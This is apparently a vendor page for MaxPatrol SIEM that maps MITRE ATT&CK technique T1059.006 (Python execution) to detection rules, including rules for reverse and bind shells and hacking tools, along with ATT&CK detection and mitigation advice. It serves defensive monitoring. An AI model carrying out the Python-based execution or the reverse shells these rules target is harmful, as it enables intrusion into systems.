MaxPatrol SIEM

Detects cyberincidents that undermine cyber resilience of a company

T1059.006: Python

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

it_bastion: PT-CR-2184: SKDPUNT_Blacklisted_Command: A blacklisted command is executed
mitre_attck_execution: PT-CR-339: Script_Files_Execution: A user attempted to run a script
unix_mitre_attck_execution: PT-CR-1018: Unix_Hacktool_Usage: The rule detects the use of security analysis tools on Unix hosts
unix_mitre_attck_execution: PT-CR-1031: Unix_Inline_Reverse_or_Bind_Shell: Bind or reverse shell creation is detected based on specific command line patterns
unix_mitre_attck_execution: PT-CR-1678: Unix_File_Creation_by_Script: A file was created using a Python or Ruby script
it_bastion: PT-CR-2171: SKDPUNT_Suspicious_Command: A user executed a potentially dangerous command
it_bastion: PT-CR-2177: SKDPUNT_Potentially_Dangerous_Command: Potentially dangerous commands are used
unix_mitre_attck_execution: PT-CR-296: Unix_Reverse_Shell: A reverse-shell connection using third-party tools
pt_application_firewall: PT-CR-1915: PTAF_Hacktool_Detected: PT AF detected signs of a hacking tool being used

Detection

IDDS0009Data source and componentProcess: Process CreationDescription

Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor newly executed processes that may abuse Python commands and scripts for execution.

IDDS0017Data source and componentCommand: Command ExecutionDescription

Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor executed commands and arguments that may abuse Python commands and scripts for execution.

Mitigation

IDM1038NameExecution PreventionDescription

Denylist Python where not required.

IDM1047NameAuditDescription

Inventory systems for unauthorized Python installations.

IDM1049NameAntivirus/AntimalwareDescription

Anti-virus can be used to automatically quarantine suspicious files.

IDM1033NameLimit Software InstallationDescription

Prevent users from installing Python where not required.